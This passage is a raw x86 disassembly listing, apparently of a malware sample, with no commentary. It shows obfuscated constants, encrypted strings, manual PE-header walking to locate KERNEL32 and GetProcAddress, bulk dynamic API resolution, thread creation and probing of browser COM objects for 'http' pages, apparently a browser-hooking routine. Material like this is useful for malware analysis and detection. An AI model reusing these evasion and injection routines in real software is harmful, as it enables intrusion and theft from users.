lea eax, [ebp-14h]
push eax
push dword ptr ds:10012790h[edi*4]
call dword ptr ds:10012650h
cmp dword ptr [ebp-14h], 103h
jz short loc_419E6A
push dword ptr ds:10012790h[edi*4]
call dword ptr ds:10011654h
and dword ptr ds:10012790h[edi*4], 0
loc_419E6A: ; CODE XREF: .data:00419E2E�j
; .data:00419E53�j
lea eax, [ebp-0Eh]
push eax
call dword ptr ds:10012668h
mov [ebp-4], eax
cmp eax, 3
jz short loc_419EB2
cmp eax, 4
jz short loc_419EB2
cmp eax, 2
jz short loc_419EB2
cmp dword ptr ds:10012790h[edi*4], 0
jz loc_419F50
mov ebx, ds:100130F8h
movsx edx, word ptr ds:100130E8h
add ebx, edx
sub ebx, 8
mov ds:1000F630h[edi*4], ebx
jmp loc_419F50
; ---------------------------------------------------------------------------
loc_419EB2: ; CODE XREF: .data:00419E7A�j
; .data:00419E7F�j ...
push 1
call dword ptr ds:1000E000h
lea eax, [ebp-24h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-18h]
push eax
lea eax, [ebp-0Eh]
push eax
call dword ptr ds:1000F0D4h
mov ebx, ds:10013134h
sub ebx, 8
cmp eax, ebx
jnz short loc_419EFE
cmp dword ptr ds:10012790h[edi*4], 0
jz short loc_419F50
movsx ebx, word ptr ds:10013144h
sub ebx, 6
mov ds:1000F630h[edi*4], ebx
jmp short loc_419F50
; ---------------------------------------------------------------------------
loc_419EFE: ; CODE XREF: .data:00419EDF�j
cmp dword ptr ds:10012790h[edi*4], 0
jnz short loc_419F50
mov ds:1000F630h[edi*4], edi
lea eax, [ebp-28h]
push eax
movsx eax, word ptr ds:10013264h
add eax, ds:10013194h
sub eax, 12h
push eax
lea ebx, ds:1000F630h[edi*4]
push ebx
push 1000263Bh
mov ebx, ds:10013114h
add ebx, ds:1001312Ch
sub ebx, 10h
push ebx
push 0
call dword ptr ds:10012B90h
mov ds:10012790h[edi*4], eax
loc_419F50: ; CODE XREF: .data:00419E8E�j
; .data:00419EAD�j ...
inc edi
loc_419F51: ; CODE XREF: .data:00419DFB�j
cmp edi, 5Ah
jbe loc_419E00
mov eax, ds:1001309Ch
sub eax, 5
push eax
call dword ptr ds:10012630h
pop ecx
jmp loc_419DF6
; ---------------------------------------------------------------------------
db 5Fh
dd 0C2C95B5Eh
db 4, 0
; =============== S U B R O U T I N E =======================================
sub_419F76 proc near ; CODE XREF: .data:0041F293�p
push 2
call sub_41F9EF
push 0
call sub_41F9EF
add esp, 8
retn
sub_419F76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419F88 proc near ; CODE XREF: .data:0041F305�p
var_30D = byte ptr -30Dh
var_30C = byte ptr -30Ch
var_308 = byte ptr -308h
var_302 = byte ptr -302h
var_203 = byte ptr -203h
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
push ebp
mov ebp, esp
sub esp, 310h
push edi
push 0FFh
lea eax, [ebp+var_302]
push eax
call dword ptr ds:1000F600h
lea eax, [ebp+var_203]
push eax
push dword ptr ds:10013168h
push 0
push 1Ch
push 0
call dword ptr ds:1000FA44h
push 10014837h
call sub_41C914
movsx edi, word ptr ds:100131B4h
sub edi, 2
push edi
lea edi, [ebp+var_203]
push edi
push eax
push 1000F0F0h
call dword ptr ds:10012634h
push 10014824h
call sub_41C914
movsx edi, word ptr ds:10013124h
sub edi, 4
push edi
lea edi, [ebp+var_203]
push edi
push eax
push 10010260h
call dword ptr ds:10012634h
lea eax, ds:100083B6h
mov ds:1001262Ch, eax
lea eax, ds:100083B6h
mov ds:1000D04Ch, eax
lea eax, ds:100069B8h
mov ds:10012774h, eax
push 1000E020h
call sub_41F596
movsx eax, word ptr ds:10013170h
mov edx, ds:10013184h
lea eax, [eax+edx+6]
push eax
push 10010230h
call sub_41F760
lea eax, ds:10009DA6h
mov ds:10010228h, eax
lea eax, ds:10004982h
mov ds:1000FA30h, eax
lea eax, ds:1000F0F0h
mov ds:10011640h, eax
lea eax, ds:10010260h
mov ds:1000D018h, eax
lea eax, ds:10012670h
mov ds:10013370h, eax
lea eax, [ebp+var_308]
push eax
movsx eax, word ptr ds:10013230h
sub eax, 6
push eax
push 0
push 10002992h
push dword ptr ds:100131C8h
push 0
call dword ptr ds:10012B90h
push eax
call dword ptr ds:10011654h
lea eax, [ebp+var_30C]
push eax
movsx eax, word ptr ds:100131E0h
sub eax, 3
push eax
push 0
push 1000155Fh
mov eax, ds:10013148h
movsx edx, word ptr ds:10013170h
add eax, edx
sub eax, 4
push eax
push 0
call dword ptr ds:10012B90h
push eax
call dword ptr ds:10011654h
mov eax, ds:1001325Ch
add eax, 2
mov ds:1000F620h, eax
mov eax, ds:100130F8h
sub eax, 6
push eax
lea eax, [ebp+var_FF]
push eax
call sub_420FA4
add esp, 3Ch
mov eax, ds:100130ECh
cmp [ebp+eax+var_103], 64h
jnz short loc_41A165
movsx eax, [ebp+var_FE]
mov edx, ds:10013238h
add edx, 1Ch
movsx ecx, word ptr ds:1001327Ch
add edx, ecx
sub eax, edx
mov [ebp+var_30D], al
movzx eax, [ebp+var_30D]
push eax
push 0
call sub_42091E
add esp, 8
mov eax, ds:10013204h
dec eax
mov ds:1000F620h, eax
loc_41A165: ; CODE XREF: sub_419F88+19D�j
mov eax, ds:10013284h
cmp [ebp+eax+var_108], 67h
jnz short loc_41A1C6
mov eax, ds:100131D0h
add eax, ds:1001325Ch
mov edx, ds:10013148h
movsx ecx, word ptr ds:1001322Ch
add edx, ecx
sub edx, 9
mov [ebp+eax+var_104], dl
lea eax, [ebp+var_FE]
push eax
call dword ptr ds:1000D054h
mov [ebp-310h], eax
push eax
push 10012670h
call sub_41AFF0
add esp, 0Ch
mov eax, ds:100131D0h
sub eax, 7
mov ds:1000F620h, eax
loc_41A1C6: ; CODE XREF: sub_419F88+1EA�j
pop edi
leave
retn
sub_419F88 endp
; ---------------------------------------------------------------------------
db 0B8h, 1, 40h
dd 10C28000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A1D1 proc near ; CODE XREF: sub_41C6CD+CD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 10013310h
push 100132D0h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_422931
pop ebp
retn
sub_41A1D1 endp
; =============== S U B R O U T I N E =======================================
sub_41A1EB proc near ; CODE XREF: .data:0041F023�p
push edi
push 10014816h
call sub_41C914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:1001329Ch, eax
test eax, eax
jnz short loc_41A21E
push 10014808h
call sub_41C914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:1001329Ch, eax
loc_41A21E: ; CODE XREF: sub_41A1EB+1A�j
push 100147F5h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1001260Ch, eax
push 100147E2h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1001164Ch, eax
push 100147D0h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000F618h, eax
push 100147BFh
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10010224h, eax
push 100147ABh
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000D050h, eax
push 1001479Ah
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000E010h, eax
push 10014783h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000F5F4h, eax
push 10014774h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10011630h, eax
push 10014767h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000D004h, eax
push 10014755h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012628h, eax
push 10014744h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012654h, eax
push 10014732h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012BA4h, eax
push 10014723h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10010220h, eax
push 10014716h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012620h, eax
push 10014707h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012644h, eax
push 100146F9h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000D040h, eax
push 100146E7h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000F0DCh, eax
push 100146D7h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000D014h, eax
push 100146CBh
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000FA40h, eax
push 100146BFh
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012604h, eax
push 100146ADh
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000F5FCh, eax
push 1001469Bh
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:10012658h, eax
push 1001468Dh
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1001265Ch, eax
push 10014679h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1001277Ch, eax
push 10014668h
call sub_41C914
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1001263Ch, eax
push 10014652h
call sub_41C914
add esp, 68h
push eax
push dword ptr ds:1001329Ch
call dword ptr ds:1000F1F8h
mov ds:1000D048h, eax
pop edi
retn
sub_41A1EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A4FB proc near ; CODE XREF: sub_41C6CD+20�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 1000h
push [ebp+arg_0]
push 0
call dword ptr ds:10010248h
pop ebp
retn
sub_41A4FB endp
; =============== S U B R O U T I N E =======================================
sub_41A512 proc near ; CODE XREF: .data:00420EA2�p
push edi
push 10014644h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012664h, eax
push 1001463Ch
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000E00Ch, eax
push 10014628h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F5E8h, eax
push 10014618h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10010244h, eax
push 10014609h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012788h, eax
push 100145FAh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D008h, eax
push 100145E8h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012B9Ch, eax
push 100145DBh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012B8Ch, eax
push 100145CCh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10011654h, eax
push 100145BDh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012624h, eax
push 100145B1h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D000h, eax
push 100145A6h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F0E0h, eax
push 1001458Fh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D00Ch, eax
push 10014578h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012640h, eax
push 10014562h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012608h, eax
push 10014552h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D034h, eax
push 10014546h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D028h, eax
push 10014536h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10010248h, eax
push 10014527h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10011634h, eax
push 10014519h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000FA34h, eax
push 1001450Ch
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F61Ch, eax
push 100144FBh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1001025Ch, eax
push 100144EAh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D02Ch, eax
push 100144DAh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012770h, eax
push 100144C8h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10010258h, eax
push 100144B7h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000E004h, eax
push 100144AAh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F60Ch, eax
push 10014499h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012668h, eax
push 10014484h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012650h, eax
push 10014474h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000E000h, eax
push 1001445Fh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F0D4h, eax
push 10014452h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10010364h, eax
push 10014442h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1001261Ch, eax
push 10014434h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10011648h, eax
push 1001441Eh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1001163Ch, eax
push 10014407h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F600h, eax
push 100143EFh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000FA3Ch, eax
push 100143D7h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000D010h, eax
push 100143BEh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012614h, eax
push 100143ABh
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012780h, eax
push 10014393h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012778h, eax
push 10014382h
call sub_41C914
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012B98h, eax
push 10014370h
call sub_41C914
add esp, 0ACh
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000F5F8h, eax
pop edi
retn
sub_41A512 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9D0 proc near ; CODE XREF: .data:00420E5A�p
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_26C = byte ptr -26Ch
var_252 = byte ptr -252h
var_23D = byte ptr -23Dh
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_21F = byte ptr -21Fh
var_21E = byte ptr -21Eh
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_103 = byte ptr -103h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FE = byte ptr -0FEh
var_FD = byte ptr -0FDh
var_FC = byte ptr -0FCh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
movsx esi, word ptr ds:100131B4h
mov edx, ds:10013280h
lea ecx, [esi+edx+8]
shr edi, cl
mov esi, ds:10013270h
add esi, 0Ah
add esi, ds:10013198h
mov ecx, esi
mov ebx, edi
shl ebx, cl
loc_41AA07: ; CODE XREF: sub_41A9D0+5D�j
; sub_41A9D0+99�j ...
mov [ebp+var_114], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_41AA2F
movsx eax, word ptr ds:100130BCh
movsx edx, word ptr ds:10013104h
lea eax, [eax+edx+0FFEFh]
sub ebx, eax
jmp short loc_41AA07
; ---------------------------------------------------------------------------
loc_41AA2F: ; CODE XREF: sub_41A9D0+44�j
movsx eax, word ptr ds:10013230h
mov edx, ds:100131D4h
lea eax, [eax+edx+34h]
mov edx, ebx
add edx, eax
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_118], edx
mov eax, [ebp+arg_0]
cmp edx, eax
jbe short loc_41AA6B
mov eax, ds:100131F4h
add eax, 0FFFCh
sub ebx, eax
jmp short loc_41AA07
; ---------------------------------------------------------------------------
loc_41AA6B: ; CODE XREF: sub_41A9D0+8B�j
mov eax, [ebp+var_118]
mov [ebp+var_11C], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_41AA98
mov eax, ds:100130ECh
add eax, 0FFFBh
add eax, ds:100130F0h
sub ebx, eax
jmp loc_41AA07
; ---------------------------------------------------------------------------
loc_41AA98: ; CODE XREF: sub_41A9D0+AF�j
mov eax, [ebp+var_11C]
mov eax, [eax+78h]
mov [ebp+var_120], eax
mov ecx, ebx
add ecx, eax
mov [ebp+var_110], ecx
mov eax, ecx
mov edx, ebx
add edx, [eax+0Ch]
push edx
lea eax, [ebp+var_103]
push eax
call sub_423399
mov eax, ds:1001325Ch
add eax, ds:10013138h
sub eax, 8
mov [ebp+var_4], eax
jmp short loc_41AAFA
; ---------------------------------------------------------------------------
loc_41AAD8: ; CODE XREF: sub_41A9D0+140�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_103]
cmp al, 61h
jle short loc_41AAF7
cmp al, 7Ah
jge short loc_41AAF7
mov eax, [ebp+var_4]
lea eax, [ebp+eax+var_103]
sub byte ptr [eax], 20h
loc_41AAF7: ; CODE XREF: sub_41A9D0+114�j
; sub_41A9D0+118�j
inc [ebp+var_4]
loc_41AAFA: ; CODE XREF: sub_41A9D0+106�j
mov eax, [ebp+var_4]
movsx eax, [ebp+eax+var_103]
mov edx, ds:100130A0h
sub edx, 4
cmp eax, edx
jnz short loc_41AAD8
cmp [ebp+var_103], 4Bh
jnz short loc_41AB48
cmp [ebp+var_102], 45h
jnz short loc_41AB48
cmp [ebp+var_101], 52h
jnz short loc_41AB48
cmp [ebp+var_FE], 4Ch
jnz short loc_41AB48
cmp [ebp+var_FD], 33h
jnz short loc_41AB48
cmp [ebp+var_FC], 32h
jz short loc_41AB4D
loc_41AB48: ; CODE XREF: sub_41A9D0+149�j
; sub_41A9D0+152�j ...
jmp loc_41AD7C
; ---------------------------------------------------------------------------
loc_41AB4D: ; CODE XREF: sub_41A9D0+176�j
movsx eax, word ptr ds:10013264h
add eax, ds:10013248h
sub eax, 9
mov [ebp+var_108], eax
jmp loc_41AD67
; ---------------------------------------------------------------------------
loc_41AB68: ; CODE XREF: sub_41A9D0+3A6�j
mov eax, [ebp+var_108]
movsx ecx, word ptr ds:10013218h
dec ecx
mul ecx
mov [ebp+var_228], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+20h]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_224], edx
push edx
lea eax, [ebp+var_21F]
push eax
call sub_423399
movsx eax, word ptr ds:10013240h
mov edx, eax
add edx, ds:10013238h
cmp byte ptr [ebp+edx+var_224+3], 47h
jnz loc_41AD61
mov edx, ds:100130A0h
add edx, ds:10013120h
cmp byte ptr [ebp+edx+var_228+2], 74h
jnz loc_41AD61
cmp [ebp+eax+var_21E], 50h
jnz loc_41AD61
movsx eax, word ptr ds:10013178h
movsx edx, word ptr ds:100130C0h
add eax, edx
cmp [ebp+eax+var_21F], 63h
jnz loc_41AD61
mov eax, ds:10013234h
add eax, ds:10013154h
cmp byte ptr [ebp+eax+var_224+1], 41h
jnz loc_41AD61
mov eax, ds:100131A0h
add eax, 2
add eax, ds:1001323Ch
cmp [ebp+eax+var_21F], 72h
jnz loc_41AD61
mov eax, [ebp+var_108]
mov ecx, ds:10013194h
sub ecx, 7
mul ecx
mov [ebp+var_288], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+24h]
mov [ebp+var_114], edx
movzx eax, word ptr [edx]
mov [ebp+var_22C], eax
movsx ecx, word ptr ds:10013144h
sub ecx, 2
mul ecx
mov [ebp+var_28C], eax
mov edx, ebx
add edx, eax
mov eax, [ebp+var_110]
add edx, [eax+1Ch]
mov [ebp+var_10C], edx
mov eax, edx
mov edx, ebx
add edx, [eax]
mov [ebp+var_230], edx
mov ds:10013294h, ebx
mov ds:1000F1F8h, edx
lea edi, [ebp+var_23D]
lea esi, ds:100137C8h
mov ecx, 0Dh
rep movsb
lea edi, [ebp+var_252]
lea esi, ds:100137D5h
mov ecx, 15h
rep movsb
lea edi, [ebp+var_26C]
lea esi, ds:100137EAh
mov ecx, 0Dh
rep movsw
lea edi, [ebp+var_281]
lea esi, ds:10013804h
mov ecx, 15h
rep movsb
lea eax, [ebp+var_23D]
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012B90h, eax
lea eax, [ebp+var_252]
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10012660h, eax
lea eax, [ebp+var_26C]
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:1000E008h, eax
lea eax, [ebp+var_281]
push eax
push dword ptr ds:10013294h
call dword ptr ds:1000F1F8h
mov ds:10011650h, eax
jmp short loc_41AD7C
; ---------------------------------------------------------------------------
loc_41AD61: ; CODE XREF: sub_41A9D0+1F1�j
; sub_41A9D0+20B�j ...
inc [ebp+var_108]
loc_41AD67: ; CODE XREF: sub_41A9D0+193�j
mov eax, [ebp+var_110]
mov eax, [eax+18h]
cmp [ebp+var_108], eax
jb loc_41AB68
loc_41AD7C: ; CODE XREF: sub_41A9D0:loc_41AB48�j
; sub_41A9D0+38F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A9D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AD81 proc near ; CODE XREF: .data:0042133F�p
var_10034 = dword ptr -10034h
var_10030 = byte ptr -10030h
var_1002C = dword ptr -1002Ch
var_10028 = dword ptr -10028h
var_10024 = dword ptr -10024h
var_10020 = byte ptr -10020h
var_10018 = dword ptr -10018h
var_10010 = dword ptr -10010h
var_1000C = dword ptr -1000Ch
var_10008 = dword ptr -10008h
var_10003 = byte ptr -10003h
var_10002 = byte ptr -10002h
var_10001 = byte ptr -10001h
var_10000 = byte ptr -10000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10034h
call sub_423379
push ebx
push esi
push edi
cmp dword ptr ds:10013370h, 0
jnz short loc_41ADB1
mov eax, ds:100130D4h
add eax, ds:10013280h
cmp ds:1000F620h, eax
jb loc_41AFEB
loc_41ADB1: ; CODE XREF: sub_41AD81+17�j
lea eax, [ebp+var_10020]
push eax
call dword ptr ds:1000D038h
lea eax, [ebp+var_10030]
push eax
lea eax, [ebp+var_10020]
push eax
push 9
mov eax, ds:10013148h
sub eax, 2
push eax
push [ebp+arg_0]
call dword ptr ds:10010254h
mov edi, eax
mov eax, ds:100130F4h
sub eax, 7
cmp edi, eax
jnz loc_41AFEB
mov esi, [ebp+var_10018]
and [ebp+var_1000C], 0
lea eax, [ebp+var_1000C]
push eax
push 10014AD8h
push esi
mov edx, [esi]
call dword ptr ds:0[edx]
mov edi, eax
movsx eax, word ptr ds:100131F0h
sub eax, 3
cmp edi, eax
jnz loc_41AFEB
lea eax, [ebp+var_10024]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+78h]
mov edi, eax
mov eax, ds:100131A0h
sub eax, 3
cmp edi, eax
jnz loc_41AFE5
lea eax, [ebp+var_10003]
push eax
push [ebp+var_10024]
call sub_41C841
add esp, 8
mov edx, eax
inc edx
mov [ebp+var_10034], edx
push [ebp+var_10024]
call dword ptr ds:10012BA0h
cmp [ebp+var_10003], 68h
jnz short loc_41AE9C
cmp [ebp+var_10002], 74h
jnz short loc_41AE9C
cmp [ebp+var_10001], 74h
jnz short loc_41AE9C
cmp [ebp+var_10000], 70h
jz short loc_41AEA1
loc_41AE9C: ; CODE XREF: sub_41AD81+FE�j
; sub_41AD81+107�j ...
jmp loc_41AFE5
; ---------------------------------------------------------------------------
loc_41AEA1: ; CODE XREF: sub_41AD81+119�j
lea eax, [ebp+var_10010]
push eax
mov eax, [ebp+var_1000C]
push eax
mov edx, [eax]
call dword ptr [edx+48h]
mov edi, eax
mov eax, ds:10013164h
movsx edx, word ptr ds:10013170h
add eax, edx
sub eax, 6
cmp edi, eax
jnz loc_41AFE5
lea eax, [ebp+var_4]
push eax
push 10014A58h
mov eax, [ebp+var_10010]
push eax
mov edx, [eax]
call dword ptr ds:0[edx]
mov edi, eax
movsx eax, word ptr ds:10013264h
add eax, ds:100131F8h
sub eax, 0Ch
cmp edi, eax
jnz loc_41AFD9
lea eax, [ebp+var_10008]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+1B0h]
mov edi, eax
movsx eax, word ptr ds:10013150h
add eax, ds:100131ECh
sub eax, 10h
cmp edi, eax
jnz loc_41AFD0
lea eax, [ebp+var_10028]
push eax
mov eax, [ebp+var_10008]
push eax
mov edx, [eax]
call dword ptr [edx+70h]
mov edi, eax
mov eax, ds:100130F8h
add eax, ds:10013110h
sub eax, 0Ch
cmp edi, eax
jz short loc_41AF64
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
jmp short loc_41AFD0
; ---------------------------------------------------------------------------
loc_41AF64: ; CODE XREF: sub_41AD81+1D3�j
xor ebx, ebx
mov eax, [ebp+var_10028]
cmp [ebp+var_10008], eax
jz short loc_41AF77
xor ebx, ebx
inc ebx
loc_41AF77: ; CODE XREF: sub_41AD81+1F1�j
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
mov eax, [ebp+var_10028]
push eax
mov eax, [eax]
call dword ptr [eax+8]
or ebx, ebx
jnz short loc_41AFD0
lea eax, [ebp+var_1002C]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov edi, eax
mov eax, ds:10013268h
sub eax, 4
cmp edi, eax
jnz short loc_41AFD0
push [ebp+var_1002C]
push [ebp+var_4]
call nullsub_1
push [ebp+var_1002C]
push [ebp+var_4]
call sub_420477
add esp, 10h
loc_41AFD0: ; CODE XREF: sub_41AD81+1A8�j
; sub_41AD81+1E1�j ...
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_41AFD9: ; CODE XREF: sub_41AD81+17B�j
mov eax, [ebp+var_10010]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_41AFE5: ; CODE XREF: sub_41AD81+C7�j
; sub_41AD81:loc_41AE9C�j ...
push esi
mov eax, [esi]
call dword ptr [eax+8]
loc_41AFEB: ; CODE XREF: sub_41AD81+2A�j
; sub_41AD81+6B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41AD81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AFF0 proc near ; CODE XREF: sub_419F88+229�p
; sub_41B354+37B�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
